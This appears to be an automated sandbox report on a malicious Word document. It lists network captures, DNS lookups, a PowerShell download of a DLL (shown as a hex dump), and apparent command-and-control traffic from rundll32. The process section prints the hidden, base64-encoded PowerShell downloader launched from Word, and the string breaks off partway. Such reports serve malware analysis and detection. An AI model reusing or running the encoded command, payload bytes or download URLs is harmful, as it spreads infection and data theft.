Jan 26, 2021 13:48:40.773195028 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.823092937 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.823749065 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.823838949 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.824584007 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.825581074 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.825651884 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.894222975 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.894599915 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.894680977 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.896627903 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.896656990 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.896755934 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.945208073 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.945919991 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.946500063 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.946592093 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.947149992 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.947335005 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:41.001072884 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:41.001903057 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:41.002090931 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:41.002572060 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:41.003340006 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:41.003447056 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:41.068594933 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:41.069504976 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:41.069694042 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:41.069878101 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:41.070483923 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:41.070713043 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:41.110780954 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:41.111191988 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:41.111323118 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:41.111670971 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:41.112183094 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:41.112350941 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:41.157565117 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:41.375380039 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:41.453783035 CET	49167	80	192.168.2.22	35.200.206.198
Jan 26, 2021 13:48:41.453847885 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:49:03.471903086 CET	49169	80	192.168.2.22	184.66.18.83
Jan 26, 2021 13:49:06.494820118 CET	49169	80	192.168.2.22	184.66.18.83
Jan 26, 2021 13:49:14.843240023 CET	49170	80	192.168.2.22	202.187.222.40
Jan 26, 2021 13:49:17.852621078 CET	49170	80	192.168.2.22	202.187.222.40
Jan 26, 2021 13:49:23.859240055 CET	49170	80	192.168.2.22	202.187.222.40
Jan 26, 2021 13:49:35.875246048 CET	49171	80	192.168.2.22	202.187.222.40
Jan 26, 2021 13:49:38.883250952 CET	49171	80	192.168.2.22	202.187.222.40
Jan 26, 2021 13:49:44.889878988 CET	49171	80	192.168.2.22	202.187.222.40
Jan 26, 2021 13:50:01.507455111 CET	49172	443	192.168.2.22	167.71.148.58
Jan 26, 2021 13:50:01.702881098 CET	443	49172	167.71.148.58	192.168.2.22
Jan 26, 2021 13:50:01.702996969 CET	49172	443	192.168.2.22	167.71.148.58
Jan 26, 2021 13:50:01.704492092 CET	49172	443	192.168.2.22	167.71.148.58
Jan 26, 2021 13:50:01.704595089 CET	49172	443	192.168.2.22	167.71.148.58
Jan 26, 2021 13:50:01.899683952 CET	443	49172	167.71.148.58	192.168.2.22
Jan 26, 2021 13:50:01.899732113 CET	443	49172	167.71.148.58	192.168.2.22
Jan 26, 2021 13:50:01.899781942 CET	49172	443	192.168.2.22	167.71.148.58
Jan 26, 2021 13:50:02.095324039 CET	443	49172	167.71.148.58	192.168.2.22
Jan 26, 2021 13:50:02.095370054 CET	443	49172	167.71.148.58	192.168.2.22
Jan 26, 2021 13:50:02.496376038 CET	443	49172	167.71.148.58	192.168.2.22
Jan 26, 2021 13:50:02.496397018 CET	443	49172	167.71.148.58	192.168.2.22
Jan 26, 2021 13:50:02.496408939 CET	443	49172	167.71.148.58	192.168.2.22
Jan 26, 2021 13:50:02.496520996 CET	49172	443	192.168.2.22	167.71.148.58

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2021 13:48:34.802895069 CET	52197	53	192.168.2.22	8.8.8.8
Jan 26, 2021 13:48:34.871607065 CET	53	52197	8.8.8.8	192.168.2.22
Jan 26, 2021 13:48:36.703888893 CET	53099	53	192.168.2.22	8.8.8.8
Jan 26, 2021 13:48:36.761370897 CET	53	53099	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 26, 2021 13:48:34.802895069 CET	192.168.2.22	8.8.8.8	0xc6cc	Standard query (0)	zenithcampus.com	A (IP address)	IN (0x0001)
Jan 26, 2021 13:48:36.703888893 CET	192.168.2.22	8.8.8.8	0xbdfc	Standard query (0)	localaffordableroofer.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 26, 2021 13:48:34.871607065 CET	8.8.8.8	192.168.2.22	0xc6cc	No error (0)	zenithcampus.com		35.200.206.198	A (IP address)	IN (0x0001)
Jan 26, 2021 13:48:36.761370897 CET	8.8.8.8	192.168.2.22	0xbdfc	No error (0)	localaffordableroofer.com		107.180.12.39	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

zenithcampus.com

localaffordableroofer.com

167.71.148.58

167.71.148.58:443

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	35.200.206.198	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 13:48:35.139708996 CET	0	OUT	GET /l/yQ/ HTTP/1.1 Host: zenithcampus.com Connection: Keep-Alive
Jan 26, 2021 13:48:36.680448055 CET	0	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 (Ubuntu) Date: Tue, 26 Jan 2021 12:48:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-transform, no-cache, no-store, must-revalidate Link: <https://zenithcampus.com/wp-json/>; rel="https://api.w.org/" Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	107.180.12.39	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 13:48:36.917365074 CET	1	OUT	GET /ralphs-receipt-f2uhf/qTT5DC/ HTTP/1.1 Host: localaffordableroofer.com Connection: Keep-Alive
Jan 26, 2021 13:48:37.120006084 CET	2	IN	HTTP/1.1 200 OK Date: Tue, 26 Jan 2021 12:48:36 GMT Server: Apache X-Powered-By: PHP/7.3.23 Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Tue, 26 Jan 2021 12:48:36 GMT Content-Disposition: attachment; filename="xSgpFNtuu.dll" Content-Transfer-Encoding: binary Set-Cookie: 60100fa4f16a1=1611665316; expires=Tue, 26-Jan-2021 12:49:36 GMT; Max-Age=60; path=/ Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Tue, 26 Jan 2021 12:48:36 GMT Vary: Accept-Encoding,User-Agent Keep-Alive: timeout=5 Transfer-Encoding: chunked Content-Type: application/octet-stream Data Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b6 c1 e8 7b f2 a0 86 28 f2 a0 86 28 f2 a0 86 28 6c 00 41 28 f3 a0 86 28 ff f2 59 28 e8 a0 86 28 ff f2 67 28 b0 a0 86 28 ff f2 66 28 4c a0 86 28 2f 5f 4d 28 f7 a0 86 28 f2 a0 87 28 92 a0 86 28 8f d9 67 28 f1 a0 86 28 8f d9 5a 28 f3 a0 86 28 ff f2 5d 28 f3 a0 86 28 f2 a0 11 28 f3 a0 86 28 8f d9 58 28 f3 a0 86 28 52 69 63 68 f2 a0 86 28 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 78 2f e2 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 00 00 b2 01 00 00 ba 02 00 00 00 00 00 78 8e 00 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 04 00 00 04 00 00 00 00 00 00 03 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 4e 02 00 52 00 00 00 c4 4e 02 00 3c 00 00 00 00 a0 02 00 20 d6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 04 00 78 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 38 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7b b0 01 00 00 10 00 00 00 b2 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 86 00 00 00 d0 01 00 00 88 00 00 00 b6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ac 3c 00 00 00 60 02 00 00 1c 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 d6 01 00 00 a0 02 00 00 d8 01 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 78 1a 00 00 00 80 04 00 00 1c 00 00 00 32 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.${(((lA((Y((g((f(L(/_M((((g((Z((]((((X((Rich(PELx/_!xpNRN< x8@H.text{ `.rdata@@.data<`>@.rsrc Z@@.relocx2@B
Jan 26, 2021 13:48:37.120270967 CET	4	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 26, 2021 13:48:37.120913029 CET	5	IN	Data Raw: cc cc cc cc 55 8b ec 53 8b 5d 08 56 57 8b f1 8b 4d 0c 8b 7b 10 3b f9 0f 82 e9 00 00 00 2b f9 39 7d 10 0f 42 7d 10 3b f3 75 47 8d 04 0f 39 46 10 0f 82 da 00 00 00 83 7e 14 10 89 46 10 72 19 8b 16 51 6a 00 8b ce c6 04 02 00 e8 a5 02 00 00 5f 8b c6 Data Ascii: US]VWM{;+9}B};uG9F~FrQj_^[]Qj_^[]F;s$vWMtj{r~r*(u~r_^[]_^[]tWPRn~~r8_^[
Jan 26, 2021 13:48:37.121715069 CET	7	IN	Data Raw: 75 f9 2b d1 8b 4d 08 89 55 e8 8b 01 8b 40 04 8b 5c 08 24 8b 7c 08 20 85 db 7c 16 7f 0e 85 ff 74 10 85 db 7c 0c 7f 04 3b fa 76 06 2b fa 1b de eb 0e 0f 57 c0 66 0f 13 45 dc 8b 5d e0 8b 7d dc 8b 54 08 38 89 4d dc 85 d2 74 0a 8b 02 8b ca ff 50 04 8b Data Ascii: u+MU@\$\| \|t\|;v+WfE]}T8MtPME@\|uD<t;t`MPzEEueB%E@tj\|XtR@T@L8UA 8t#Q0~HI B
Jan 26, 2021 13:48:37.201613903 CET	8	IN	Data Raw: 16 ff 52 04 56 e8 00 45 00 00 83 c4 04 8d 4d e8 e8 4e 41 00 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc 55 8b ec 6a ff 68 1a bd 01 10 64 a1 00 00 00 00 50 83 ec 10 56 a1 50 62 02 10 33 c5 50 8d 45 f4 64 a3 Data Ascii: RVEMNAMdY_^[]UjhdPVPb3PEduj@EFFFF3FfFFfF F$F(F,F0EEu(EEPMlhXEEEP`PV4EMdY^]U
Jan 26, 2021 13:48:37.201947927 CET	9	IN	Data Raw: 00 f6 45 08 01 74 09 56 e8 ee 53 00 00 83 c4 04 8b c6 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 57 6a 00 6a 40 68 00 30 00 00 ff 75 0c 6a 00 ff 15 10 d0 01 10 50 e8 b2 39 00 00 ff 75 0c 8b 0d 74 60 02 10 8b f8 ff 75 08 Data Ascii: EtVS^]UWjj@h0ujP9ut`u3WEt`__]ADUjh{dPHSVWPb3PEd}3]tw9usjRu]tLEu
Jan 26, 2021 13:48:37.202394962 CET	11	IN	Data Raw: 14 10 89 4e 10 72 0f 8b 06 5b 5f c6 04 08 00 8b c6 5e 5d c2 08 00 8b c6 c6 04 08 00 5b 5f 8b c6 5e 5d c2 08 00 68 74 d2 01 10 e8 87 35 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 01 85 c0 75 06 b8 f8 d2 01 10 c3 8b 48 18 85 c9 74 03 8b c1 c3 Data Ascii: Nr[_^][_^]ht5uHtUEAI#t}uuMu?h=]jjUhTh`jMMhEEELPUhlh`j'hEEELPuUUE]
Jan 26, 2021 13:48:37.202956915 CET	12	IN	Data Raw: 83 38 00 74 2b 8b 51 30 8b 02 85 c0 7e 22 48 89 02 8b 49 20 8b 11 8d 42 01 89 01 b9 04 00 00 00 8a 45 08 88 02 0f b6 c0 83 f8 ff 0f 44 f9 eb 4e 8b 45 08 8b 11 0f b6 c0 50 ff 52 0c 83 f8 ff b9 04 00 00 00 0f 44 f9 eb 35 8b 4d ec 8b 01 8b 50 04 8b Data Ascii: 8t+Q0~"HI BEDNEPRD5MPDz8uBB.u}EHAy8uAI#t)hTh`jMhEEELPDPt)hlh`j
Jan 26, 2021 13:48:37.269664049 CET	14	IN	Data Raw: ff ff ff 50 8d 85 60 ff ff ff 50 8d 45 d8 50 8d 45 c0 50 8d 85 e8 fe ff ff 50 e8 49 e9 ff ff 83 c4 0c 50 8d 85 18 ff ff ff 50 e8 b9 e8 ff ff 83 c4 0c 50 8d 85 48 ff ff ff 50 e8 a9 e8 ff ff 83 c4 0c 83 bd 2c ff ff ff 10 72 0e ff b5 18 ff ff ff e8 Data Ascii: P`PEPEPPIPPPHP,rC,(rC5<jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
Jan 26, 2021 13:48:37.269866943 CET	15	IN	Data Raw: d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a Data Ascii: jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
Jan 26, 2021 13:48:37.270140886 CET	16	IN	Data Raw: d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a 00 ff d6 6a 00 6a Data Ascii: jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49172	167.71.148.58	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2021 13:50:01.704492092 CET	296	OUT	POST /um49al9zetvy1g5wmnt/twmd2l9pj/0k1iudym/ag1m0i31pvl6lis/m8khm/21qx1r3lmxejnl/ HTTP/1.1 DNT: 0 Referer: 167.71.148.58/um49al9zetvy1g5wmnt/twmd2l9pj/0k1iudym/ag1m0i31pvl6lis/m8khm/21qx1r3lmxejnl/ Content-Type: multipart/form-data; boundary=-----------------------z2vqH5ZpSVZftRl6dB758VD User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 167.71.148.58:443 Content-Length: 5908 Connection: Keep-Alive Cache-Control: no-cache
Jan 26, 2021 13:50:02.496376038 CET	304	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Jan 2021 12:50:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 37 64 34 0d 0a 95 b8 22 bf 79 50 d2 d8 9d 39 e0 cf 06 07 31 6c 91 7d 90 6f 81 50 7b 35 e6 3c 42 b2 29 10 03 e1 16 cf 24 1c b8 82 6e 58 ef bc 0c 03 05 07 1d 53 e0 7e 8b fe f8 44 56 68 d3 5f 6a 2a ff 56 73 38 dc f3 1d aa 6e 44 4b e6 7f 0f b9 fa 52 0b 14 3c 92 b2 d0 27 a5 35 33 32 e2 fa 6d 4c c2 6e 68 c7 3c 06 94 b9 58 5f 9f cc 2a 98 b5 71 97 a4 c8 cc 90 21 53 e2 a0 ca 31 38 2c 3e e4 19 c0 32 74 a3 d8 f8 1b ff a3 48 b6 f0 28 e3 27 54 67 ea 41 43 6b 5f c2 10 a7 f1 de 83 65 fe f1 48 73 7e f4 47 a8 dc 91 58 4b 26 41 1e 84 a0 06 7e b2 d2 fd c0 7b 30 02 84 2e 62 db b4 53 0b bd ce 99 d3 9e 97 dd a0 9a dd ee bd f3 f7 22 c6 e7 12 61 34 83 69 b8 5f c8 2d 16 8f 71 70 18 74 f6 e7 5a c6 fa a8 47 79 6e 29 0d 0f a0 31 49 5b 1a c9 73 ff fc 2c 42 99 e3 fb 96 07 58 83 c0 5e ea d3 70 8c ab 18 c0 e0 c8 75 c4 a0 e8 63 13 91 0e 4e 2b 97 ad 84 f1 6c 87 3a f5 85 da e8 9d d9 2a 4c 0b b1 15 af 15 42 1b 31 36 6d 7d 82 97 fb 26 83 23 5e 01 e6 41 88 d7 ce b2 3f d3 47 24 8c 6c 98 68 17 4f 8d c5 0b 5b 71 90 f7 7c a6 38 cc 77 52 c3 78 fc 24 93 1c 1f ea 06 6c 5a ed 88 fc cf a0 2d 48 c7 62 6c da 45 16 3e ca b1 ff 0c 7a 4b ce cf 37 01 3c 94 bc 9a 23 ce 5c 0f 33 e2 05 5d f0 1f 8b 51 a1 fc 7b bd 5c 49 90 ac 4a 59 e5 59 d5 25 c0 ff 73 c5 9a e3 c0 c0 fb 60 31 39 d1 2c 48 19 bd ed 58 41 57 16 82 c5 e7 22 57 10 e7 96 e9 13 ee 2f f6 25 e0 07 31 64 b7 b3 35 bd c0 81 57 33 34 45 1c ce a2 57 9b 4c 21 d2 bd 61 a6 cc 65 be 77 1c 34 f4 30 3b f2 d0 67 ec 57 c3 14 6c e0 af db 0f 44 e5 13 62 ae 9c 16 77 e2 0b 0f 93 6a 5a d3 6f 49 30 c0 1e fc 14 3a a1 65 02 1a 75 9f 82 be d1 66 0b d0 44 73 66 26 ea 21 9a 4a 3b a9 8a 0d e0 b7 54 40 26 b4 ff 88 8c 69 ae a8 de 91 b4 76 89 b2 bf a2 82 b5 c4 bd 87 33 e4 de 98 62 52 52 16 2e 90 ba ed 18 e9 f3 7a 09 da d0 ed d6 4a ab d6 60 91 0e 36 f7 49 0c ce 1f dd cd 05 84 b5 86 8d 9c 08 71 b7 8f 78 f9 7b 19 aa 0b 4b 68 a9 8b 05 34 50 2e 1e c1 7a 19 09 d6 78 39 f5 c0 ef 15 ad 85 e8 26 23 1c df a2 26 a0 bb 48 72 5a 34 e4 9c ad 9b b4 2d 4f 22 bf e9 63 33 72 ae 82 63 c3 b7 16 1d c9 6f 9e 10 5d 6a 28 b5 ee 4c 3b cb cc 84 56 d3 09 a1 f7 95 88 30 af 36 ab 2f b2 38 27 19 d1 e2 92 bc 50 c3 7e 74 5e e5 5a bf da 47 6d 91 34 54 86 5a 8f f2 ca 47 93 ec 0e 06 3e 64 ac 81 40 27 ad 4f dc ca db 07 a8 f4 58 e7 f5 b3 58 65 11 5d 57 53 3a 3d 50 f7 62 d8 72 ea af 55 8c cd f7 39 00 b7 a1 7a 15 41 e0 39 93 0f fd 49 45 0f c3 46 88 47 9b 78 fc b6 34 54 43 9c 8b 95 5c 72 87 70 2a 51 8f 45 8e a3 3e 78 05 33 10 20 a5 64 4e b1 b4 1c 4d 3d 08 b6 fa 71 26 17 c6 9d de 46 1e df 28 91 d5 67 73 ed 20 29 bf 88 f9 71 71 d7 5a aa 07 28 0c 0a f3 ea f4 e1 fe 05 1a 48 e2 ec 12 e9 0e 42 f9 b7 63 74 91 29 ae 3f 7a 1f 8f ac 15 4b 5f 44 51 ab 38 1d b5 91 cd 43 08 70 df a0 89 36 11 10 b1 aa eb c3 45 36 f1 51 d3 77 11 e4 fd 34 bf 09 23 30 ca 6e 46 e4 a5 52 fd 0d 69 b8 7a ab a9 39 99 4a 09 b9 93 1e f2 f0 c0 9a 62 dd 3c bd 89 4c b1 87 f5 2d c8 13 ed db b7 37 33 9a 3b f9 b0 26 36 b5 d9 f2 a5 57 0f 51 36 47 93 9a 1c 2c f8 50 9f 1a d0 6f 3b a9 7c 3b a7 71 35 89 91 61 bd 4c 45 a4 9a e7 7c 19 70 50 b8 f0 47 9a 91 bd e5 b1 c9 1f fb fa 0a 10 c0 31 c0 07 5f db f7 5e e4 ae d3 72 32 80 34 2e 35 3b f7 ea 9e f2 8f 3a 8e 29 07 88 79 23 67 95 5c f6 a6 d0 ec 56 e5 13 53 5f 8f 4f f5 5e 0d 96 58 6b ff 2e 93 98 0d db bb c2 be 66 57 5b 0e 3a 13 cf d2 8a 19 5a f2 e8 99 a4 88 fa f1 00 c6 d7 c4 88 07 61 1d 20 1e 95 ce 7c 8f ee 50 ce 30 e5 68 27 ff c8 49 b7 79 d5 8c 4e 76 3a 6b 21 e1 c3 88 02 ea e0 24 e5 52 a8 be b0 b4 92 6d 30 98 ad 87 c0 92 2a a1 d9 b3 82 95 30 4d f1 09 10 fa c8 9f 76 Data Ascii: 7d4"yP91l}oP{5<B)$nXS~DVh_jVs8nDKR<'532mLnh<X_q!S18,>2tH('TgACk_eHs~GXK&A~{0.bS"a4i_-qptZGyn)1I[s,BX^pucN+l:LB16m}&#^A?G$lhO[q\|8wRx$lZ-HblE>zK7<#\3]Q{\IJYY%s`19,HXAW"W/%1d5W34EWL!aew40;gWlDbwjZoI0:eufDsf&!J;T@&iv3bRR.zJ`6Iqx{Kh4P.zx9&#&HrZ4-O"c3rco]j(L;V06/8'P~t^ZGm4TZG>d@'OXXe]WS:=PbrU9zA9IEFGx4TC\rpQE>x3 dNM=q&F(gs )qqZ(HBct)?zK_DQ8Cp6E6Qw4#0nFRiz9Jb<L-73;&6WQ6G,Po;\|;q5aLE\|pPG1_^r24.5;:)y#g\VS_O^Xk.fW[:Za \|P0h'IyNv:k!$Rm0*0Mv

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 1820 Parent PID: 584

General

Start time:	13:47:41
Start date:	26/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13fa90000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2332 Parent PID: 1220

General

Start time:	13:47:45
Start date:	26/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkA